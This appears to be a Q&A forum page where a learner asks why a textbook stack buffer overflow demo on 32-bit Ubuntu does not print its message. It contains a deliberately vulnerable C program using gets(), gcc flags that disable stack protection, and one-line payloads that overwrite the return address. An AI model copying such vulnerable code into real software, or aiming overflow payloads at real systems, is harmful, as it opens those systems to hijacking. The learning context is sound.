2

I am trying to learn about buffer overflow attacks and wanted to see a working demo of the same. I have been following many online resources to understand the same. For example, this has proven really helpful so far.

I understand the concept of buffer overflow clearly, however, I am unable to get the demo working. I am on a 64-bit Mac, running 32-bit Ubuntu in VirtualBox (the machine where I am experimenting with buffer overflow). I have disabled ASLR on Ubuntu for the sake of playing around with the buffer overflow.

I have a simple C program, demo.c, taken from the video link mentioned above :

# include<stdio.h>

CanNeverExecute()
{
   printf("I can never execute");
}

GetInput()
{
   char buffer[8];
   gets(buffer) ; // the vulnerable function
   puts(buffer);
}

main()
{
  getInput();
  return 0;
}

I have tried all the below variations to compile the program as:

gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o demo demo.c

gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -o demo demo.c

gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -m32 -o demo demo.c

The idea is to overwrite the return address on the stack with the address of the CanNeverExecute() by exploiting the gets(). The address of CanNeverExecute turns out to be 0x0804847b

To do so, I have tried the following:

printf "123456789abc\x7b\x84\x04\x08" | ./demo

echo -e "123456789abc\x7b\x84\x04\x08" | ./demo

python -c 'print "a"*12 + "\x7b\x84\x04\x08"' | ./demo

where 12345678 is to fill up the buffer space, 9abc is to overwrite the value of ebp stored on the stack and finally the return address stored on the stack is overwritten with the address of CanNeverExecute()

Ideally, what I expect (as also shown in the demo link above) is the CanNeverBeExecuted() getting executed and the message in it being printed.

But contrary to the expectation, in all of the above cases, I get a "segmentation fault(core dumped)" with the following printed on the terminal :

123456789abc{,,[some_unprintable_character]

The CanNeverBeExecuted() does not get executed.

What am I missing ? What needs to be changed ? Please help.

Improve this question
1
  • main calls getInput but the function seems to be named GetInput. What is the code you're actually compiling? Commented Jan 14, 2016 at 22:16

1 Answer 1

Reset to default
4

Your "CanNeverExecute" function is executing, but you're not seeing its output. Change it to:

CanNeverExecute()
{
   printf("I can never execute\n");
   fflush(stdout);
}

The problem is that the program crashes before the output buffer is flushed.

Improve this answer
Sign up to request clarification or add additional context in comments.

3 Comments

Adding a newline character will flush stdout anyway.
Oleg: I think that is true if stdout is writing to a terminal, but not if it is writing to a device/file that isn't interactive
Awesome. I have had this experience with C earlier, when I used to code in C. It had faded somewhere in my memories. Thanks a ton guys.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.